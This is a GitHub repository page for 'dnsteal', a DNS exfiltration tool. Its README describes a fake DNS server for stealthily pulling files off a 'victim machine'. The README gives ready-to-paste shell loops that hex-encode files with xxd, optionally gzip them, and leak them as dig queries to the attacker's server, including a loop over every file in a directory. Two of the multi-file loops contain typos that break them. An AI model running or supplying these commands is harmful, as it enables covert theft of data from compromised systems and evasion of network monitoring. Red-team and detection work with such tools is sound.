Skip to content
forked from m57/dnsteal

DNS Exfiltration tool for stealthily sending files over DNS requests.

License

Notifications You must be signed in to change notification settings

alertor/dnsteal

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

dnsteal

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below is an image showing an example of how to use:

Alt text

On the victim machine, you simply can do something like so:

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

Support for multiple files

for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done

gzip compression supported

It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:

python dnsteal.py 127.0.0.1 -z

Then on the victim machine send a Gzipped file like so:

for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

or for multiple, gzip compressed files:

for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done

~x90

About

DNS Exfiltration tool for stealthily sending files over DNS requests.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%